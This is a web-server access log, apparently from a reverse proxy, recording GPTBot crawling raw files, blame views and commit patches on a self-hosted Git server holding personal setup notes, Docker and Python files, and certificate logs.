"/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14877] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9948] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 12585] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 16070] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 12949] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch" [Client 74.7.227.38] [Length 24597416] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8.patch" [Client 74.7.227.38] [Length 127902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" -[17/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 9850] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" -[17/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746.patch" [Client 74.7.227.38] [Length 1291] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8.diff" [Client 74.7.227.38] [Length 127400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2.patch" [Client 74.7.227.38] [Length 6621] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" [Client 74.7.227.38] [Length 11038] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" -[17/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 10529] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" -[17/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 10140] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" -[17/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" -[17/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 13572] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" -[17/Feb/2026:13:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 12468] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" -[17/Feb/2026:13:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 18808] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" -[17/Feb/2026:13:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" -[17/Feb/2026:13:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" -[17/Feb/2026:13:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" -[17/Feb/2026:13:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" -[17/Feb/2026:13:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10971] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11396] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33620] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35829] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10960] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38752] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23720] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31288] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33429] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12182] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx" [Client 74.7.227.38] [Length 10141] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx" -[17/Feb/2026:13:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10973] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9501] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27248] [Gzip 11.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 